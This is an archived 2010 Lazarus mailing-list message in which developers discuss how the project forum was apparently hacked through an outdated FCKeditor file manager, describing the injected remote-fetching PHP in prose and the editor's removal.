[Lazarus] Lazarus Forum seems to be hacked!

patspiper patspiper at yahoo.com
Thu Jan 28 18:17:46 CET 2010


Was the php shell C99madshell?

It seems many sites have been recently compromised via this shell.  The 
ways the shell is uploaded depends on the vulnerabilities of the forum 
software.

Marc Weustink wrote:
> Matt Shaffer wrote:
>> Right, but what I meant was if someone manages to upload their own PHP
>> file to the lazarus server, they can easily have uploaded a PHP file
>> manager which has the capability of deleting files, etc, without ever
>> needing ssh/ftp (this assumes the attack was done through a vulnerable
>> piece of software, that had write permissions, etc.)
>>
>> I don't think this scenario is extremely likely.
>
> This is probably what happened.
> As I see now, together with tinyportal comes an outdated FCKeditor. 
> This editor has known issues. The file manager in this editor has 
> access to some tp subdir where we found a php "filemanager" through 
> which you could upload files to the whole site.
> This way some "buy-your-software-here" webshop got installed and then 
> managed added a piece of encoded php to index.php.
> What this encoded piece did was access a remote server, which in its 
> turn returned a piece of php which got executed. This piece of php 
> accesses our or similar webshops to generate traffic.
> This last part made browsing the site slow.
>
> At this moment the FCKeditor is disabled and removed.
>
> Marc
>
> -- 
> _______________________________________________
> Lazarus mailing list
> Lazarus at lists.lazarus.freepascal.org
> http://lists.lazarus.freepascal.org/mailman/listinfo/lazarus
> .
>





More information about the Lazarus mailing list